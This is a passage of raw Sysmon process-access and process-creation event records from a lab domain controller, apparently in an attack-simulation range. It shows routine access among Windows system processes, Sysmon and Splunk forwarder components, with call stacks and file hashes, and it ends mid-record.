10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7D28-5FA1-6D01-000000008801}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D28-5FA1-6D01-000000008801}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7D28-5FA1-6D01-000000008801}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:40.896{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.189{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:01.173{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7d87d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:05.582{D28789B6-7C64-5FA1-0D00-000000008801}1000648C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:05.582{D28789B6-7C64-5FA1-0D00-000000008801}1000648C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.975{D28789B6-7D5F-5FA1-7001-000000008801}30362608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D5F-5FA1-7001-000000008801}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:11.835{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 